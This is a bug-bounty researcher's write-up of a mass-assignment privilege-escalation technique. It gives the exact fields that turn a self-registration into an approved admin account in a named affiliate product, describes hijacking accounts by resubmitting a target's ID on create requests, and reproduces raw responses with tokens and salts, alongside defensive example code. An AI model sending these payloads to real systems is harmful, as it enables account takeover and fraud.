Hunter Tip #1 Response To Request Injection (RTRI)
Response To Request Injection (RTRI)
Summary
The title to this paper sounds super cool, but it is really not that cool and not that complicated. However, it is clearly overlooked by the developers of applications and researchers hunting for their next bounty. After you have finished reading it, it may seem blindingly obvious, but if this was the case, I would not be having the success I do with it as these vulnerabilities should have already been discovered.
These types of attacks have been extremely successful for me over the last two years in Bug Hunting. In fact, so successful that I can easily attribute over $250,000 worth of bounties to this class of Insecure Direct Object Reference (IDOR) attack.
Examples include: from one program I received two $15,000 awards, from another a total of $18,000, a partial payment for another of just under $13,000 (still waiting to see what the balance will be on it), and at the recent H1-702 event I received an award for $10,000. There are many more examples.
I think it is also worth pointing out a couple of quick facts:
- ALL of these programs have been running for well over a year, some nearly three years, and this class of IDOR escaped hundreds of pairs of “hacking eyes”, yet I am still finding this class of attack present
- As you can tell by the example bounty payments, some of these are large companies
For this paper, I am going to use an example that I actually found today (well, a couple of days ago now) whilst dicking around with a Bug Bounty Program. This vulnerability ended up as a zeroday in an off-the-shelf product and is classed as an Insecure Direct Object Reference Vulnerability.
Step (1) – Discovery
Whilst looking over the target, there was an option to become an affiliate. I figured I may as well try and register because if accepted it would open up the scope of the target for me. Sure enough, an email dropped in 24 hours later.
Once I was logged into my new affiliate account, I immediately noticed in the top right hand corner:
Affiliate Software by Post Affiliate Pro
version 5.5.10.7
Awesome, thanks for letting me know and saving me some time on Google searches. So instead of playing around with the target, I immediately looked to see if I could download the product so I could determine things on a local and therefore more informed basis - “white-box” testing could be a lot more informative than just hammering away at the exposed surface. Unfortunately a download was not available, but the next best thing was: an online demo on the vendor’s site:
http://demo.postaffiliatepro.com/affiliates/
The first thing to try was the Merchant Login (wherever possible I always start with the highest privilege account I can, then work backwards).
Also, whenever I can, some of the first things I always focus on from an application administrator point of view are:
- adding a low privileged user
- adding an “admin” user
As we are logged in as the “admin” account, I created an affiliate account
And the POST data for creating the Affiliate account
Examining the POST data, the one thing that catches my eye is
["rstatus","A"] – this is clearly the value for a user being approved. With this class of IDOR however, the RESPONSE is actually more important. We see ["rtype","A",null,""], so at this point I assume this is setting the account type as “A” for Affiliate (see Appendix A-1 for text format).
Now we move on to creating a Merchant (admin) account
The POST data for creating a Merchant Account
What is immediately clear is the ["roleid","pap_merc"], which is self-explanatory.
When looking at the response, I noticed the following: ["rtype","M",null,""] (see Appendix A-2 for text format).
This is clearly setting the account type, with “M” being Merchant.
For our final test, we now self-register an account as an unauthenticated user. In the bug bounty target’s scenario, the affiliate registration required manual approval by the target Admin, or in this case the target Merchant Account.
Still using the demo account, I want to see what the POST request looks like and the response.
The self-registration POST data
Nothing exactly interesting there, but the response however is somewhat more interesting.
- ["rtype","A",null,""] – it has set us as an Affiliate (obviously)
- ["roleid","pap_aff",null,""] – it has allocated us with the role of Affiliate
- ["rstatus","P",null,""] – it has set our account in a Pending state as it requires manual approval by the Merchant (see Appendix A-3 for text format)
A common mistake I am seeing regularly is that developers are trusting user-supplied data on a POST (create)!!! even though it is NEVER expected within a request. So for a quick demo:
Step (2) – The Attack
We are going to self-register an account again, but this time adding to our POST data –
["rtype","M"],["roleid","pap_merc"],["rstatus","A"]
Note:
- At NO time has the parameter “rtype” ever been present within a POST request; it is ONLY ever returned in responses. THIS IS EXTREMELY COMMON IN RTRI attacks. Pay good attention to the responses.
- If we send ["roleid","pap_merc"] without the “rtype” value, your account sits in limbo land. You can’t even log into the application because you will have an rtype of Affiliate, yet you have a role of Merchant. The application is a little confused at this point :)
Response - (see Appendix A-4 for text format)
Now viewing the Merchants as the Merchant, we see our account is added and its status is marked as approved.
As easy as that :) Clearly at this point we have not managed to create a password, so we use the Forgot Password tool and then reset it and log in.
So in summary we went from an unauthenticated user to authenticated, bypassed the manual approval process and elevated privileges to Merchant (admin) all in a single request.
With this particular attack on the target I could:
- View Customer PII and PCI data (limited to Bank Accounts / Swift Codes / PayPal Accounts etc)
- Set payouts of money to anyone – including myself of course. An example transaction on the site was for $23,500.00
- Edit all affiliate accounts
- Edit the entire portal
- The vulnerability increased my attack surface area which introduced further vulnerabilities – examples found were, downloading of files from the file system, server side request forgery attacks that even returned the raw HTML of the target
- Ability to install plugins that would further increase my attack surface area hopefully introducing more vulnerabilities that could allow remote code execution.
On so many occasions, I have taken data from the response and literally crafted my own requests with some devastating effects against the application, hence some of the very large bounties that have been awarded.
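For the developer reading this, the signup mistake and its fix side by side, as an added example (not the vendor's code). It assumes the request body is a JSON array of name/value pairs like the ones quoted above; the allowlist and the function names are hypothetical.

```python
import json
import secrets

# Assumed allowlist: the only names a self-registering visitor may set.
SIGNUP_ALLOWED = {"username", "firstname", "lastname", "agreeWithTerms",
                  "parentuserid", "refid"} | {f"data{i}" for i in range(1, 10)}

# Decided by the server for every unauthenticated signup (values from the
# self-registration response shown above: Affiliate, pap_aff, Pending).
SIGNUP_FORCED = {"rtype": "A", "roleid": "pap_aff", "rstatus": "P"}


class RejectedField(ValueError):
    """The request carried a field this caller may not set."""


def parse_fields(body):
    """Parse [["name","value"], ...] into a dict; refuse malformed or repeated names."""
    fields = {}
    for pair in json.loads(body):
        if not (isinstance(pair, list) and len(pair) >= 2 and isinstance(pair[0], str)):
            raise RejectedField("malformed field entry")
        if pair[0] in fields:
            raise RejectedField("duplicate field: " + pair[0])
        fields[pair[0]] = pair[1]
    return fields


def signup_vulnerable(body):
    """The mistake: server defaults first, then every client field bound on top."""
    record = dict(SIGNUP_FORCED)
    record.update(parse_fields(body))      # client rtype/roleid/rstatus overwrite defaults
    record["userid"] = secrets.token_hex(4)
    return record


def signup_hardened(body, strict=True):
    """Bind allowlisted fields only; privileged attributes are applied last.

    Returns (record, unexpected_names). With strict=True any unexpected name
    rejects the whole request, which also makes tampering visible in logs.
    """
    fields = parse_fields(body)
    unexpected = sorted(set(fields) - SIGNUP_ALLOWED)
    if unexpected and strict:
        raise RejectedField("unexpected fields: " + ", ".join(unexpected))
    record = {k: v for k, v in fields.items() if k in SIGNUP_ALLOWED}
    record.update(SIGNUP_FORCED)           # server decision always wins
    record["userid"] = secrets.token_hex(4)
    return record, unexpected


# Constructed sample bodies (not captured traffic).
NORMAL_SIGNUP = json.dumps([["username", "new@example.com"], ["firstname", "New"],
                            ["lastname", "User"], ["agreeWithTerms", "Y"]])
TAMPERED_SIGNUP = json.dumps(json.loads(NORMAL_SIGNUP) +
                             [["rtype", "M"], ["roleid", "pap_merc"], ["rstatus", "A"]])

if __name__ == "__main__":
    print("vulnerable:", {k: signup_vulnerable(TAMPERED_SIGNUP)[k] for k in SIGNUP_FORCED})
    print("hardened  :", signup_hardened(TAMPERED_SIGNUP, strict=False))
    try:
        signup_hardened(TAMPERED_SIGNUP)
    except RejectedField as exc:
        print("strict    :", exc)
```

A regression test for this class of bug is to replay every field name seen in a create response back into the create request and assert that the stored record is unchanged or the request is refused.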
Another common attack you will see, still using the same principle, is batch requests. Yahoo Gemini or Yahoo Mail are classic examples. These batch requests contain other requests within the POST data (99% of the time JSON), for example:
{"method":"POST", "url":"http://www.foobar.com", "data":"mydata"}
In most cases, I see that the POST is always on a create action. For example, create a new user. When updating a user, the batch data will either be PUT or a PATCH but will also contain other unique data relevant to the existing session say for example the userID value.
So the attack here is to look at the response data on a POST request and note the values returned. Using our example of creating a user, you will likely see a userid and some other really interesting info being returned.
Now make the POST request again, passing in some of these values. As mentioned previously, I have seen this on many bug bounty programs. Using the simple example of creating a user account where the userID is returned with the POST request, if I now make the POST request again but this time add in an arbitrary userid, I literally end up hijacking the account, or a soft delete, meaning we now own that userId but the previous data attached to that userid is now replaced with our own.
If we tried to update the userid using the PUT / PATCH, the application 99% of the time would give a forbidden error message. But, because the application sees a create action (POST), it does not bother to check the data and trusts the data being passed directly to it and simply overwrites the existing entry.
And finally another example is simple POST / PUT requests. I had some great success with this against Square - https://squareup.com/
Example:
POST /appointments/api/staff – Creates a staff member. The response returns the new staff_id
PUT /appointments/api/staff/12345678-1234-1234-1234-123456789012 – Updates a staff member
Using their own application, when booking an appointment, you chose the member of staff from the company, which gave us the staff_id GUID. So for this attack, we would always go after the owner :)
Using the same principle, we made the POST request again, but added into our JSON POST data
"id":"GUID-OF-THE-TARGET"
Again, the application was trusting the user-supplied data sent on a POST (create). Trying this on a PUT (update), the application responded correctly with a permission error. The end result of this attack allowed a hijack of the owner's account and a $3,000.00 bounty.
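The create-versus-update asymmetry described here and in the batch request case above, as an added example (not code from any of the programs mentioned). `StaffStore`, its field sets and the account names are hypothetical; the GUID is the placeholder used in the text.

```python
import uuid

# Hypothetical field sets for a staff record; "id" and "account" are server-owned.
CLIENT_FIELDS = {"name", "email"}
SERVER_OWNED = {"id", "account"}


class Forbidden(Exception):
    """Caller does not own the record."""


class BadRequest(Exception):
    """Request carried a server-owned field or collided with an existing row."""


class StaffStore:
    def __init__(self):
        self.rows = {}                      # staff_id -> record

    def update(self, caller, staff_id, data):
        """PUT path: ownership is checked, so a foreign id is refused."""
        row = self.rows.get(staff_id)
        if row is None or row["account"] != caller:
            raise Forbidden(staff_id)
        row.update({k: v for k, v in data.items() if k in CLIENT_FIELDS})
        return row

    def create_vulnerable(self, caller, data):
        """POST path that honours a client-supplied id and upserts over it."""
        staff_id = data.get("id") or str(uuid.uuid4())
        self.rows[staff_id] = {"id": staff_id, "account": caller,
                               "name": data.get("name"), "email": data.get("email")}
        return self.rows[staff_id]

    def create_hardened(self, caller, data):
        """POST path: no server-owned input, server-generated id, insert-only."""
        offered = sorted(SERVER_OWNED & set(data))
        if offered:
            raise BadRequest("server-owned fields in create: " + ", ".join(offered))
        staff_id = str(uuid.uuid4())
        if staff_id in self.rows:           # never overwrite on create
            raise BadRequest("id collision")
        self.rows[staff_id] = {"id": staff_id, "account": caller,
                               "name": data.get("name"), "email": data.get("email")}
        return self.rows[staff_id]


OWNER_ID = "12345678-1234-1234-1234-123456789012"   # placeholder GUID from the text


def seeded_store():
    """Constructed data: one record that belongs to account 'acme'."""
    store = StaffStore()
    store.rows[OWNER_ID] = {"id": OWNER_ID, "account": "acme",
                            "name": "Owner", "email": "owner@acme.example"}
    return store
```

The same rule applies to each sub-request inside a batch: authorize and validate it exactly as if it had arrived on its own, with create handlers refusing any identifier the server is supposed to assign.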
I have many examples; some are completely insane literally building up my own POST requests with around 7 additional parameters and values to finally get the attack to work. That particular one took some time but paid $15,000.00
I would love to share more real examples of these and I will seek to get permission on some of them from the various bug bounty programs, but hopefully the above gives you, the developer, and you the bug hunter the general idea.
A big thanks to Mack and my brother David for proofreading my effort.
Appendix – A
(1)
[{"fields":[["name","value","values","error"],["Id","afb3ceb2",null,""],["username","foo@bar.com",null,""],["rpassword","AGZ4K7hsFC42nchnk4QSclfWwfo68qet",null,""],["firstname","Foo",null,""],["lastname","Bar",null,""],["photo","",null,""],["rstatus","A",null,""],["note","",null,""],["dontSendEmail","N",null,null],["createSignupReferralComm","N",null,null],["agreeWithTerms","Y",null,null],["parentuserid","",null,""],["refid","121212",null,""],["data1","http:\/\/www.foo.com",null,""],["data2","Foobar",null,""],["data3","Foo",null,""],["data4","Bar",null,""],["data5","NV",null,""],["data6","US",null,""],["data7","98444",null,""],["data8","",null,""],["data9","",null,""],["userid","afb3ceb2",null,""],["numberuserid","1",null,""],["rtype","A",null,""],["dateinserted","2016-08-29 13:20:52",null,""],["dateapproved","2016-08-29 13:20:52",null,""],["deleted","N",null,""],["accountuserid","ec24e2ae",null,""],["minimumpayout","300",null,""],["payoutoptionid",null,null,""],["originalparentuserid",null,null,""],["data10",null,null,""],["data11",null,null,""],["data12",null,null,""],["data13",null,null,""],["data14",null,null,""],["data15",null,null,""],["data16",null,null,""],["data17",null,null,""],["data18",null,null,""],["data19",null,null,""],["data20",null,null,""],["data21",null,null,""],["data22",null,null,""],["data23",null,null,""],["data24",null,null,""],["data25",null,null,""],["authid","7d9e60bd",null,""],["accountid","default1",null,""],["roleid","pap_aff",null,""],["lastlogin",null,null,""],["loginscount",null,null,""],["salt","oEofC0rbLSinbGT0zzddX6efnKaWnyuMcT1PTt0Elj2wZWxzvKMtR0IfLTb8rGUD",null,""],["authtoken","34d5d76beb2814a76cc2469da581d4d7",null,""],["notificationemail",null,null,""],["ip","71.2.69.51",null,""],["openid_user_id",null,null,""]],"success":"Y","message":"Affiliate was successfully added"},{"rows":[["id","userid","refid","firstname","lastname","username","rstatus","dateinserted","parentuserid","parentfirstname","parentlastname"],["afb3ceb2","afb3ceb2","121212","Foo","Bar","foo@bar.com","A","2016-08-29 13:20:52",null,null,null],["11111111","11111111","testaff","Test","Affiliate","affiliate@example.com","A","2016-08-29 13:00:56",null,null,null]],"count":2}]
(2)
[{"fields":[["name","value","values","error"],["Id","6e933d74",null,""],["firstname","Hi",null,""],["lastname","Jack",null,""],["username","bar@foo.com",null,""],["rpassword","dAUVTjMIqCm\/CYlPeWkUz6QMCt5oU\/oQ",null,""],["retypepassword","P@ssw0rd!!",null,null],["roleid","pap_merc",null,""],["photo","",null,""],["userid","6e933d74",null,""],["refid","1a5f96f2",null,""],["numberuserid",null,null,""],["rtype","M",null,""],["dateinserted","2016-08-29 13:27:07",null,""],["dateapproved","2016-08-29 13:27:07",null,""],["deleted","N",null,""],["accountuserid","1a5f96f2",null,""],["parentuserid",null,null,""],["minimumpayout","300",null,""],["payoutoptionid",null,null,""],["note",null,null,""],["originalparentuserid",null,null,""],["data1",null,null,""],["data2",null,null,""],["data3",null,null,""],["data4",null,null,""],["data5",null,null,""],["data6","bar@foo.com",null,""],["data7",null,null,""],["data8",null,null,""],["data9",null,null,""],["data10",null,null,""],["data11",null,null,""],["data12",null,null,""],["data13",null,null,""],["data14",null,null,""],["data15",null,null,""],["data16",null,null,""],["data17",null,null,""],["data18",null,null,""],["data19",null,null,""],["data20",null,null,""],["data21",null,null,""],["data22",null,null,""],["data23",null,null,""],["data24",null,null,""],["data25",null,null,""],["authid","fa6ea33b",null,""],["accountid","default1",null,""],["rstatus","A",null,""],["lastlogin",null,null,""],["loginscount",null,null,""],["salt","NDkxUoqA8raobBz2pmFNeVHnsbNa25hPJBmDZNe8fpwq16tqs8dH3V5v6TG8YXYI",null,""],["authtoken","366b39065032b9d013bf16ab6f81a8da",null,""],["notificationemail",null,null,""],["ip","71.2.69.51",null,""],["openid_user_id",null,null,""]],"success":"Y","message":"Admin was successfully added"}]
(3)
[{"fields":[["name","value","values","error"],["Id","b4b47799",null,""],["username","xxx@xxx.com",null,""],["firstname","xxx",null,""],["lastname","xxx",null,""],["agreeWithTerms","Y",null,null],["parentuserid","",null,""],["refid","65757",null,""],["data1","http:\/\/www.ggg.com",null,""],["data2","xxx",null,""],["data3","xxx",null,""],["data4","xxx",null,""],["data5","xxx",null,""],["data6","US",null,""],["data7","98444",null,""],["data8","",null,""],["data9","",null,""],["lang",null,null,null],["userid","b4b47799",null,""],["payoutoptionid","8444af30",null,""],["numberuserid","1",null,""],["rtype","A",null,""],["dateinserted","2016-08-29 13:35:55",null,""],["dateapproved",null,null,""],["deleted","N",null,""],["accountuserid","6c2fdb96",null,""],["minimumpayout","300",null,""],["note",null,null,""],["photo",null,null,""],["originalparentuserid",null,null,""],["data10",null,null,""],["data11",null,null,""],["data12",null,null,""],["data13",null,null,""],["data14",null,null,""],["data15",null,null,""],["data16",null,null,""],["data17",null,null,""],["data18",null,null,""],["data19",null,null,""],["data20",null,null,""],["data21",null,null,""],["data22",null,null,""],["data23",null,null,""],["data24",null,null,""],["data25",null,null,""],["authid","a69ad936",null,""],["accountid","default1",null,""],["roleid","pap_aff",null,""],["rstatus","P",null,""],["lastlogin",null,null,""],["loginscount",null,null,""],["rpassword","Th0VoPJj",null,""],["salt",null,null,""],["authtoken","e7d289c907b453caa3f28adfdedcfcae",null,""],["notificationemail",null,null,""],["ip","71.2.69.51",null,""],["openid_user_id",null,null,""]],"success":"Y","message":"Affiliate was successfully added"}]
(4)
[{"fields":[["name","value","values","error"],["Id","d59aa0e7",null,""],["username","hijacker@hijack.com",null,""],["firstname","Hax",null,""],["lastname","Or",null,""],["rtype","M",null,""],["roleid","pap_merc",null,""],["rstatus","A",null,""],["agreeWithTerms","Y",null,null],["parentuserid","",null,""],["refid","10101",null,""],["data1","http:\/\/www.hijacked.com",null,""],["data2","xxx",null,""],["data3","xxx",null,""],["data4","xxx",null,""],["data5","xxx",null,""],["data6","US",null,""],["data7","98444",null,""],["data8","",null,""],["data9","",null,""],["lang",null,null,null],["userid","d59aa0e7",null,""],["payoutoptionid","8444af30",null,""],["numberuserid","1",null,""],["dateinserted","2016-08-29 13:42:41",null,""],["dateapproved","2016-08-29 13:42:41",null,""],["deleted","N",null,""],["accountuserid","1072b8a1",null,""],["minimumpayout","300",null,""],["note",null,null,""],["photo",null,null,""],["originalparentuserid",null,null,""],["data10",null,null,""],["data11",null,null,""],["data12",null,null,""],["data13",null,null,""],["data14",null,null,""],["data15",null,null,""],["data16",null,null,""],["data17",null,null,""],["data18",null,null,""],["data19",null,null,""],["data20",null,null,""],["data21",null,null,""],["data22",null,null,""],["data23",null,null,""],["data24",null,null,""],["data25",null,null,""],["authid","532d5465",null,""],["accountid","default1",null,""],["lastlogin",null,null,""],["loginscount",null,null,""],["rpassword","ftN3fNlfLABZKrUudxdS1LCqbMbI10gW",null,""],["salt","u3KqtcaNmRtSEWnN44uxT0DrwdPLnLHROrihEs40kyTYuhMymh5ghJHNWwzjigb6",null,""],["authtoken","1499336f6ac1140f9b4d404c7cacb792",null,""],["notificationemail",null,null,""],["ip","71.2.69.51",null,""],["openid_user_id",null,null,""]],"success":"Y","message":"Affiliate was successfully added"}]